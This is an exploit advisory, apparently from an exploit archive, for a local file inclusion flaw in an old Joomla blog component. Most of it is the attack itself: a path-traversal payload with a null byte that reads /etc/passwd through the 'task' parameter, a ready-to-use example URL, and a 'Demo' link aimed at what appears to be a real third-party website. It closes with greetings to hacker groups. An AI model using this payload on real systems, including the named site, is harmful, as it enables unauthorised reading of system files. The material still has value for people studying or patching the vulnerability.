The Joomla Blog component suffers from a local file inclusion vulnerability.
ccd4eed99373a1a012cdda7abcc0520402cb25e1ed056bcfb3b4f4d39409c62a
# Exploit Title: Joomla Component com_blog LFI Vulnerability
# Date: 2010-03-03
# Author: DevilZ TM
# Software Link: N/A
# Version: 3.0.329
# Code :
[~]######################################### InformatioN #############################################[~]
[~] Title : Joomla Component com_blog LFI Vulnerability
[~] Author : DevilZ TM By D3v1l
[~] Homepage : https://www.DEVILZTM.com
[~] Contact : DevilZTM@Gmail.CoM & D3v1l.blackhat@gmail.com
[~]######################################### ExploiT #################################################[~]
[~] Vulnerable File :
https://127.0.0.1/index.php?option=com_myblog&Itemid=12&task=[LFI]
[~] ExploiT :
../../../../../../../../etc/passwd%00
[~] Example :
https://127.0.0.1/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../etc/passwd%00
[~] Demo :
https://willardparks.com/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../etc/passwd%00
[~]######################################### ThankS To ... ############################################[~]
[~] Specilal Thanks To My Best FriendS :
Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS
[~] IRANIAN Young HackerZ
[~]######################################## FinisH :D #################################################[~]